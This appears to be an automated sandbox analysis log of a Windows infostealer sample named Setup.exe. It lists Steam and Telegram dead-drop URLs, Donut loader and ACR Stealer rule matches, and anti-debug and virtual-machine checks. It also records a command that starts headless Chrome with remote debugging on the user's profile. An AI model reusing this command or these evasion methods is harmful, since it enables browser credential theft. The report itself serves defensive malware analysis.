      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089/badges
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830124954.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089/inventory/
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611996806600890
      Source: Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barni
      Source: Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barnif1575b64-8492-4e8b-b102-4d26e8c70371https:
      Source: Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barnir5qt6tMozilla/5.0
      Source: Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089barniunknownf
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089dll2
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
      Source: Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;E
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830124954.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/poin
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: Setup.exe, Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/sdfasdjr
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
      Source: chrome.exe, 00000002.00000002.3553921309.000065080272C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://update.googleapis.com/service/update2/json
      Source: chrome.exe, 00000002.00000002.3541370501.0000650800040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2504426717.0000650800340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2504426717.0000650800343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://update.googleapis.com/service/update2/json?cup2key=13:OIBbUfwhMnqdxbWyvOJC_kK27q7qls8Go0LZCI
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
      Source: chrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
      Source: chrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
      Source: chrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
      Source: unknown | HTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 104.21.2.114:443 -> 192.168.2.4:49734 version: TLS 1.2

      System Summary

      Source: 0.2.Setup.exe.2d223e4.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: 0.2.Setup.exe.2d223e4.0.unpack, type: UNPACKEDPE | Matched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
      Source: 0.2.Setup.exe.2d223e4.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: 0.2.Setup.exe.2d223e4.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
      Source: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_02DC1927 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_02DC1927
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_031A5280 NtCreateFile,GetProcessHeap,RtlAllocateHeap,NtReadFile,0_2_031A5280
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_03182A20 NtQueryAttributesFile,0_2_03182A20
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_03199F30 NtQuerySystemInformation,0_2_03199F30
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_03199D60 NtQuerySystemInformation,0_2_03199D60
      Source: C:\Users\user\Desktop\Setup.exe | Code function: String function: 02D93507 appears 84 times
      Source: C:\Users\user\Desktop\Setup.exe | Code function: String function: 031E1D23 appears 64 times
      Source: C:\Users\user\Desktop\Setup.exe | Code function: String function: 031A80B0 appears 49 times
      Source: C:\Users\user\Desktop\Setup.exe | Code function: String function: 02D59894 appears 47 times
      Source: C:\Users\user\Desktop\Setup.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 2236
      Source: Setup.exe | Static PE information: invalid certificate
      Source: Setup.exe | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: Setup.exe, 00000000.00000000.1677142282.00000000006F3000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs Setup.exe
      Source: Setup.exe | Binary or memory string: OriginalFileName vs Setup.exe
      Source: Setup.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: 0.2.Setup.exe.2d223e4.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: 0.2.Setup.exe.2d223e4.0.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
      Source: 0.2.Setup.exe.2d223e4.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: 0.2.Setup.exe.2d223e4.0.raw.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
      Source: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: chrome.exe, 00000002.00000002.3537859038.000001C7CC8C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;.VBp
      Source: classification engine | Classification label: mal92.troj.spyw.evad.winEXE@30/25@8/7
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_02D20A77 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,Thread32Next,0_2_02D20A77
      Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_031A20C0 CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,CoUninitialize,0_2_031A20C0
      Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199680660089[1].htm
      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6592
      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\61b8b99b-7df5-44c1-8384-528c7cdab547
      Source: C:\Users\user\Desktop\Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: chrome.exe, 00000002.00000002.3545415544.000065080098C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCALUE:2};e
      Source: chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
      Source: Setup.exe | String found in binary or memory: -Helper process exited with failure code: 0x%x
      Source: Setup.exe | String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
      Source: Setup.exe | String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
      Source: Setup.exe | String found in binary or memory: /LoadInf=
      Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2140 --field-trial-handle=2028,i,5279315519537041474,755320844484096508,262144 --disable-features=PaintHolding /prefetch:8
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 2236
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 1264
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: netapi32.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wtsapi32.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winsta.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: rstrtmgr.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: dxgi.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dll
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: websocket.dll
      Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: Setup.exeStatic file information: File size 76542479 > 1048576
      Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c1800
      Source: Setup.exeStatic PE information: section name: .didata
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D301DB push edx; retf 0000h0_2_02D301EF
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D934E4 push ecx; ret 0_2_02D934F7
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031AE071 push cs; retf 0000h0_2_031AE072
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031E1D00 push ecx; ret 0_2_031E1D13
      Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
      Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-78559
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03182080 FindFirstFileA,FindNextFileA,Sleep,0_2_03182080
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0317DED0 FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,0_2_0317DED0
      Source: Amcache.hve.7.drBinary or memory string: VMware
      Source: Setup.exe, 00000000.00000003.1807976102.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Setup.exe, 00000000.00000003.1807976102.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: chrome.exe, 00000002.00000002.3535742311.000001C7C87AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: Amcache.hve.7.drBinary or memory string: vmci.sys
      Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: chrome.exe, 00000002.00000002.3538585204.000001C7CEDD0000.00000002.00000001.00040000.0000000F.sdmp, chrome.exe, 00000002.00000003.2084427828.0000650801404000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ~]lx{tn~lzyqeMu{_tvwpd
      Source: Amcache.hve.7.drBinary or memory string: VMware20,1
      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: chrome.exe, 00000002.00000002.3546413895.0000650800B90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=086384ee-2905-4eea-8d44-73f7532592bd
      Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\Setup.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031CBEAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_031CBEAD
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20367 mov edx, dword ptr fs:[00000030h]0_2_02D20367
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20927 mov eax, dword ptr fs:[00000030h]0_2_02D20927
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D589B4 mov eax, dword ptr fs:[00000030h]0_2_02D589B4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20F76 mov eax, dword ptr fs:[00000030h]0_2_02D20F76
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20F77 mov eax, dword ptr fs:[00000030h]0_2_02D20F77
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20CD7 mov eax, dword ptr fs:[00000030h]0_2_02D20CD7
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A71D0 mov eax, dword ptr fs:[00000030h]0_2_031A71D0
